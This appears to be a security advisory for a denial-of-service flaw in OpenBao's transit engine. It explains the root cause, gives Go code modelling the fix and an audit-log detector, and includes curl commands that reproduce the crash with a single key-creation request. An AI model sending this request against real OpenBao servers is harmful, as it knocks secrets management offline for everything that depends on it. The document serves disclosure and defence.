On OpenBao versions 2.5.4 and 2.5.2 (and likely earlier versions), an authenticated caller with write access to `transit/keys/` can crash the OpenBao server with a single key-creation request that combines an asymmetric key type (`rsa-*`, `ecdsa-*`, `ed25519`) with `derived: true`. The server returns no HTTP response and the process terminates with exit code 2. This is a remote, low-complexity denial of service against the OpenBao server.
The vulnerability lies in the transit engine's key-creation path. When `derived: true` is supplied alongside an asymmetric key type, the code that handles key derivation assumes a symmetric key shape (a derivable key context). Because an asymmetric key does not carry the expected derived-key fields, the creation path likely panics on a missing derived-key field or a failed type assertion instead of returning a structured validation error. Nothing recovers the panic, so the whole OpenBao process exits. The issue can be triggered with either a JSON or an HCL payload and affects all nodes in a cluster.
The root cause is a missing validation check that rejects `derived: true` in combination with any non-symmetric key type. The fix is to validate the (type, derived) combination at the top of the create-key handler and return HTTP 400 when `derived: true` is set on any type other than the symmetric ones that support derivation (`aes128-gcm96`, `aes256-gcm96`, `chacha20-poly1305`, `xchacha20-poly1305`).
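The following Go program is an added example written for this page; it is not OpenBao's code and the names (`validateDerived`, `keyEntry`, `symmetricKDF`, `unsafeCreate`, `safeCreate`, `recoverCreate`) are assumptions. It models the failure mode described above, a derived branch that does an unchecked type assertion on a field only symmetric keys populate, and shows the two layers a fix needs: the (type, derived) validation at the top of the handler, and a request-scoped recover so that any remaining panic becomes an error rather than a process exit.

```go
package main

import (
	"errors"
	"fmt"
)

// Symmetric key types the advisory lists as the only ones allowed with
// derived=true. Every other type is rejected before the key is built.
var derivableTypes = map[string]bool{
	"aes128-gcm96":       true,
	"aes256-gcm96":       true,
	"chacha20-poly1305":  true,
	"xchacha20-poly1305": true,
}

// ErrDerivedAsymmetric is the structured error a handler would map to HTTP 400.
var ErrDerivedAsymmetric = errors.New("derived keys are only supported for symmetric key types")

// validateDerived is the (type, derived) check the advisory proposes at the
// top of the create-key handler. Hypothetical helper, not OpenBao's own code.
func validateDerived(keyType string, derived bool) error {
	if !derived || derivableTypes[keyType] {
		return nil
	}
	return fmt.Errorf("%w: %q", ErrDerivedAsymmetric, keyType)
}

// symmetricKDF stands in for the derivation context only symmetric keys carry.
type symmetricKDF struct{ Mode string }

// keyEntry is a reduced model (assumption) of a transit key: the KDF field is
// untyped and stays nil for asymmetric types.
type keyEntry struct {
	Type    string
	Derived bool
	KDF     interface{}
}

func newEntry(keyType string, derived bool) *keyEntry {
	k := &keyEntry{Type: keyType, Derived: derived}
	if derived && derivableTypes[keyType] {
		k.KDF = &symmetricKDF{Mode: "hkdf"}
	}
	return k
}

// unsafeCreate reproduces the failure mode the advisory describes: the derived
// branch assumes a symmetric key shape, so the unchecked type assertion below
// panics ("interface conversion ... is nil") for rsa-*, ecdsa-* and ed25519.
func unsafeCreate(keyType string, derived bool) (string, error) {
	k := newEntry(keyType, derived)
	if k.Derived {
		kdf := k.KDF.(*symmetricKDF)
		return fmt.Sprintf("%s derived via %s", k.Type, kdf.Mode), nil
	}
	return k.Type, nil
}

// safeCreate is the fixed path: validate the combination first, return a
// structured error, and only then run the existing creation logic.
func safeCreate(keyType string, derived bool) (string, error) {
	if err := validateDerived(keyType, derived); err != nil {
		return "", err
	}
	return unsafeCreate(keyType, derived)
}

// recoverCreate is defence in depth for the "panic is not recovered" half of
// the bug: a request-scoped recover turns any panic that still slips through
// into an error for that one request instead of terminating the server.
func recoverCreate(keyType string, derived bool) (result string, err error) {
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("internal error creating key: %v", r)
		}
	}()
	return unsafeCreate(keyType, derived)
}

func main() {
	for _, kt := range []string{"aes256-gcm96", "rsa-2048", "ed25519"} {
		_, err := safeCreate(kt, true)
		fmt.Printf("safeCreate(%s, derived=true): err=%v\n", kt, err)
		_, err = recoverCreate(kt, true)
		fmt.Printf("recoverCreate(%s, derived=true): err=%v\n", kt, err)
	}
}
```

Calling `unsafeCreate("rsa-2048", true)` directly terminates the program the same way the advisory describes for the server; `safeCreate` never reaches the assertion for that input, and `recoverCreate` survives it with an error. Both layers are worth having: the validation gives the caller a useful 400, and the recover keeps the next unforeseen panic from taking the whole process down.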
DailyCVE Form:
Platform: OpenBao
Version: 2.5.4, 2.5.2
Vulnerability: DoS
Severity: Moderate
Date: 2026-06-17
Prediction: 2026-06-17
What Undercode Say:
Mount the transit engine:

```shell
curl -sS -X POST -H "X-Vault-Token: root" \
  -d '{"type":"transit"}' \
  http://127.0.0.1:8200/v1/sys/mounts/transit
```

Trigger the crash:

```shell
curl -sS -w '\nHTTP %{http_code}\n' -X POST \
  -H "X-Vault-Token: root" \
  -H "Content-Type: application/json" \
  -d '{"type":"rsa-2048","derived":true,"exportable":true,"deletion_allowed":false}' \
  http://127.0.0.1:8200/v1/transit/keys/some-key-name
```

Observed output:

```
HTTP 000
curl: (52) Empty reply from server

$ docker ps -a --filter name=openbao
STATUS: Exited (2)
```
Exploit:
An authenticated attacker with write permission on `transit/keys/` sends a single POST request that creates a key with an asymmetric type (e.g. `rsa-2048`, `ecdsa-p256`, `ed25519`) and `derived: true`. The server panics and exits immediately, returning no HTTP response. The attack needs no special skill and has low complexity, so it can be repeated after every restart to keep the service unavailable.
Protection:
- Upgrade to a fixed build (`0.0.0-20260617104123-db57c62602b2` or later) as soon as one is available.
- If an immediate upgrade is not possible, restrict write access to `transit/keys/` to highly trusted identities via policy, and monitor the audit log for key-creation requests that set `derived: true` on an asymmetric type.
- If you build from source, apply the suggested fix: a validation check at the top of the create-key handler that rejects `derived: true` for any non-symmetric type and returns HTTP 400.
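The detector below is an added example for the monitoring mitigation, not a tool shipped by OpenBao or the reporter. It reads JSON-lines audit output, keeps only `request` records for `transit/keys/<name>` (the mount path from the reproduction above is an assumption), and flags any `update`/`create` that sets `derived: true` on a type outside the symmetric list. One caveat the example handles: the audit device HMACs string request values such as `type` unless the key is listed in the mount's `audit_non_hmac_request_keys`, so an `hmac-sha256:` value cannot be classified and is surfaced for review instead of being dropped. The sample log lines are constructed for this example.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"strings"
)

// transitMount is the mount path assumed from the reproduction; adjust per deployment.
const transitMount = "transit/"

var derivableTypes = map[string]bool{
	"aes128-gcm96":       true,
	"aes256-gcm96":       true,
	"chacha20-poly1305":  true,
	"xchacha20-poly1305": true,
}

// auditEntry models only the audit-log fields this detector reads.
type auditEntry struct {
	Type    string `json:"type"`
	Request struct {
		Operation string                 `json:"operation"`
		Path      string                 `json:"path"`
		Data      map[string]interface{} `json:"data"`
	} `json:"request"`
}

type finding struct {
	Line    int
	Path    string
	KeyType string
	Reason  string
}

// isKeyCreatePath matches transit/keys/<name> exactly; sub-paths such as
// transit/keys/<name>/config are different operations and are ignored.
func isKeyCreatePath(p string) bool {
	prefix := transitMount + "keys/"
	if !strings.HasPrefix(p, prefix) {
		return false
	}
	name := strings.TrimPrefix(p, prefix)
	return name != "" && !strings.Contains(name, "/")
}

// scanAudit walks JSON-lines audit output and flags key-creation requests
// that set derived=true on anything other than a known symmetric type.
func scanAudit(log string) []finding {
	var out []finding
	sc := bufio.NewScanner(strings.NewReader(log))
	for n := 1; sc.Scan(); n++ {
		line := strings.TrimSpace(sc.Text())
		if line == "" {
			continue
		}
		var e auditEntry
		if err := json.Unmarshal([]byte(line), &e); err != nil {
			continue // not a JSON audit record; skip rather than abort the scan
		}
		if e.Type != "request" || !isKeyCreatePath(e.Request.Path) {
			continue
		}
		if op := e.Request.Operation; op != "update" && op != "create" {
			continue
		}
		if derived, _ := e.Request.Data["derived"].(bool); !derived {
			continue
		}
		keyType, _ := e.Request.Data["type"].(string)
		switch {
		case derivableTypes[keyType]:
			// legitimate derived symmetric key; nothing to report
		case keyType == "" || strings.HasPrefix(keyType, "hmac-sha256:"):
			// type absent or HMAC-obscured by the audit device: cannot classify,
			// so surface it for review rather than silently drop it
			out = append(out, finding{n, e.Request.Path, keyType, "derived=true with unreadable key type; review"})
		default:
			out = append(out, finding{n, e.Request.Path, keyType, "derived=true on non-symmetric key type"})
		}
	}
	return out
}

// sampleAuditLog is constructed for this example; it is not a real capture.
const sampleAuditLog = `
{"type":"request","request":{"operation":"update","path":"transit/keys/app-enc","data":{"type":"aes256-gcm96","derived":true}}}
{"type":"request","request":{"operation":"update","path":"transit/keys/some-key-name","data":{"type":"rsa-2048","derived":true,"exportable":true}}}
{"type":"request","request":{"operation":"update","path":"transit/keys/sign-key","data":{"type":"ecdsa-p256","derived":false}}}
{"type":"response","request":{"operation":"update","path":"transit/keys/some-key-name","data":{"type":"ed25519","derived":true}}}
{"type":"request","request":{"operation":"update","path":"transit/keys/other/config","data":{"derived":true}}}
{"type":"request","request":{"operation":"update","path":"transit/keys/hidden","data":{"type":"hmac-sha256:deadbeef","derived":true}}}
`

func main() {
	for _, f := range scanAudit(sampleAuditLog) {
		fmt.Printf("line %d %s type=%q: %s\n", f.Line, f.Path, f.KeyType, f.Reason)
	}
}
```

On the sample input only the `rsa-2048` request and the HMAC-obscured one are reported; the derived AES key, the non-derived ECDSA key, the response record and the `/config` sub-path are all ignored. Because the crash leaves no response record, the request record is the only evidence the audit log will hold, which is why the detector keys on `type == "request"`.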
Impact:
Successful exploitation crashes the OpenBao server process (exit code 2), causing a denial of service. All nodes in a cluster are affected, and the service stays unavailable until the process is restarted. Because the attack is remote and needs only one request, it can be repeated after each restart to keep the service down, affecting every application and service that depends on OpenBao for secrets management.
Sources:
Reported By: github.com

